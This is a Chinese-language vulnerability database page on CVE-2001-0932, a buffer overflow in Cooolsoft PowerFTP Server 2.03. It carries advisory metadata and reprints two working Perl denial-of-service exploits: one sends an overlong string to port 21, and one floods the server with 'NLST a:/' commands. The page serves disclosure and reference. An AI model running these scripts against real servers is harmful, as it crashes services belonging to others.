CVE-2001-0932
CVSS7.5
发布时间 :2001-11-28 00:00:00
修订时间 :2016-10-17 22:13:32
NMCOES    

[原文]Buffer overflow in Cooolsoft PowerFTP Server 2.03 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long command.


[CNNVD]Cooolsoft PowerFTP服务器多个服务拒绝漏洞(CNNVD-200111-049)

        Cooolsoft PowerFTP 服务器2.03版本存在缓冲区溢出漏洞。远程攻击者可以借助超长命令导致服务拒绝并可能执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0932
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0932
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200111-049
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=100698397818175&w=2
(UNKNOWN)  BUGTRAQ  20011128 PowerFTP-server-Bugs&Exploits-Remotes
http://www.securityfocus.com/bid/3595
(VENDOR_ADVISORY)  BID  3595
http://xforce.iss.net/static/7616.php
(VENDOR_ADVISORY)  XF  powerftp-long-command-dos(7616)

- 漏洞信息

Cooolsoft PowerFTP服务器多个服务拒绝漏洞
高危 缓冲区溢出
2001-11-28 00:00:00 2005-10-20 00:00:00
远程  
        Cooolsoft PowerFTP 服务器2.03版本存在缓冲区溢出漏洞。远程攻击者可以借助超长命令导致服务拒绝并可能执行任意代码。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21162)

Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial Of Service Vulnerability (1) (EDBID:21162)
windows dos
2001-11-29 Verified
0 Alex Hernandez
N/A [点击下载]
source: http://www.securityfocus.com/bid/3595/info


PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.

Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusally long string of arbitrary characters.

It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.

This issue may is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed. 

#!/usr/bin/perl
# Simple script to send a long 'A^s' command to the server, 
# resulting in the ftpd crashing
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
# G.Maggiotti & H.Oliveira.
# 
#
# Usage: perl -x PowerFTP_Dos.pl -s <server>
#
# Example: 
#
# perl -x PowerFTP_Dos.pl -s 10.0.0.1
# 220 Personal FTP Server ready
# Crash was successful !
#

use Getopt::Std;
use IO::Socket;

print("\nPowerFTP server v2.03 DoS exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048; 
$data .= $foo x $number; $EOL="\015\012";

$remote = IO::Socket::INET->new(
                    Proto => "tcp",
                    PeerAddr => $args{s},
                    PeerPort => "ftp(21)",
                ) || die("Unable to connect to ftp port at $args{s}\n");

$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");


sub usage {die("\nUsage: $0 -s <server>\n\n");}		

- 漏洞信息 (21163)

Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial Of Service Vulnerability (2) (EDBID:21163)
windows dos
2001-11-29 Verified
0 Alex Hernandez
N/A [点击下载]
source: http://www.securityfocus.com/bid/3595/info
 
 
PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.
 
Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusally long string of arbitrary characters.
 
It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.
 
This issue may is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed. 

#!/usr/bin/perl
#
# Even though the server will deny access, the slow hardware 
# will still hang the machine. This program attempts to 
# exploit this weakness by sending the 'NLST a:/' command to 
# the server 
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
# 
#
# Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass>
#
# Example: 
#
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
# 

use IO::Socket;

print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

#$NUMBER_TO_SEND = 3000; 
$BUFF = 3000; 

if ( scalar @ARGV < 4 ) {
    print "Usage: $0 <server> <port> <user> <pass>\n";
    exit();
}


$target = $ARGV[ 0 ];
$port = $ARGV[ 1 ];
$username = $ARGV[ 2 ];
$password = $ARGV[ 3 ];

print "Creating socket... ";
$sock = new IO::Socket::INET( PeerAddr => $target,
                              PeerPort => int( $port ), 
                                Proto => 'tcp' );
die "$!" unless $sock;
print "done.\n";


read( $sock, $buffer, 1 );


print "Sending username...";
print $sock "USER " . $username . "\n";
read( $sock, $buffer, 1 );
print "done.\n";


print "Sending password...";
print $sock "PASS " . $password . "\n";
read( $sock, $buffer, 1 );
print "done.\n";


print "DoS Attack floppy server...";
for( $i = 0; $i < $BUFF; $i++ ) {

    print $sock "NLST a:/\n";   
    read( $sock, $buffer, 1 );
}

print "done.\n";

close( $sock );
exit();
		

- 漏洞信息

14053
Cooolsoft PowerFTP Server Long Command Parsing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity, Loss of Availability Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- 漏洞描述

A remote overflow exists in Cooolsoft PowerFTP server. The PowerFTP server fails to correctly check the size of incoming commands resulting in a buffer overflow. With a specially crafted request composed of a command longer than 2048 characters, an attacker can cause a denial of service to the PowerFTP server resulting in a loss of availability.

- 时间线

2001-11-28 Unknow
2001-11-28 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Cooolsoft PowerFTP Server Multiple Denial Of Service Vulnerability
Boundary Condition Error 3595
Yes No
2001-11-29 12:00:00 2009-07-11 09:06:00
Discovered and posted to Bugtraq by Alex Hernandez <al3xhernandez@ureach.com>.

- 受影响的程序版本

Cooolsoft PowerFTP 2.10
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
Cooolsoft PowerFTP 2.0 3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0

- 漏洞讨论

PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.

Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusally long string of arbitrary characters.

It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.

This issue may is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed.

- 漏洞利用

al3x hernandez &lt;al3xhernandez@ureach.com&gt; has provided the following exploits:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站